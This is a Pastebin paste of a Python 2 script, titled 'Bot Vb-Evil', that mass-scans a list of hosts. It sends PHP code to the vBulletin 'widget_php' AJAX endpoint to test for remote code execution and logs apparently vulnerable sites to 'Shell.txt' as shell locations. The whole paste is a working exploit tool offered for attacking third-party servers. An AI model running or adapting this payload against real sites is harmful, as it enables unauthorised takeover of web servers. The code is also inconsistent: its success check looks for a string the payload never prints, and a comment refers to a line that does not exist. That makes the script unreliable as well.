Advertisement
Moslem1337

Bot Vb-Evil

Jan 18th, 2020
273
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.66 KB | None | 0 0
  1. # -*- coding: utf-8 -*
  2. #!/usr/bin/python
  3. #####################################
  4. ##KILL THE NET##
  5. #### PS: CHANGE Your Threads pool on line 136 to make script more faster :)
  6. ##############[LIBS]###################
  7. import requests, re, urllib2, os, sys, codecs, random
  8. from multiprocessing.dummy import Pool
  9. from time import time as timer
  10. import time
  11. from urlparse import urlparse
  12. import warnings
  13. import subprocess
  14. import urlparse
  15. import argparse
  16. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  17. warnings.simplefilter('ignore',InsecureRequestWarning)
  18. reload(sys)
  19. sys.setdefaultencoding('utf8')
  20. ##########################################################################################
  21. ktnred = '\033[31m'
  22. ktngreen = '\033[32m'
  23. ktn3yell = '\033[33m'
  24. ktn4blue = '\033[34m'
  25. ktn5purp = '\033[35m'
  26. ktn6blueblue = '\033[36m'
  27. ktn7grey = '\033[37'
  28. CEND = '\033[0m'
  29. #####################################
  30. ##########################################################################################
  31. try:
  32. with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
  33. ooo = f.read().splitlines()
  34. except IndexError:
  35. print (ktnred + '[+]================> ' + 'USAGE: '+sys.argv[0]+' ip.txt' + CEND)
  36. pass
  37. ooo = list((ooo))
  38. ##########################################################################################
  39. def ranga(url):
  40. try:
  41. host = url.strip()
  42. ua = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  43. updat = {'widgetConfig[code]':'echo "Moslem";'}
  44. postpload = requests.post(host+'/ajax/render/widget_php', headers=ua ,timeout=15, data=updat)
  45. if 'th0d3_g4nt3ng' in postpload.content:
  46. print (ktngreen+host+' Vuln'+CEND)
  47. open('Shell.txt', 'a').write(host+'/m.php\n')
  48. else:
  49. print (host +ktnred+ ' Failed'+ CEND)
  50. except:
  51. pass
  52.  
  53. #####################################
  54. def logo():
  55. clear = "\x1b[0m"
  56. colors = [36, 32, 34, 35, 31, 37]
  57. x = '''
  58. h0d3_g4n v5 \n \n '''
  59.  
  60. for N, line in enumerate(x.split("\n")):
  61. sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
  62. time.sleep(0.05)
  63. pass
  64.  
  65.  
  66. logo()
  67. ##########################################################################################
  68. def Main():
  69. try:
  70.  
  71. start = timer()
  72. ThreadPool = Pool(25)
  73. Threads = ThreadPool.map(ranga, ooo)
  74. print('TIME TAKE: ' + str(timer() - start) + ' S')
  75. except:
  76. pass
  77.  
  78.  
  79. if __name__ == '__main__':
  80. Main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement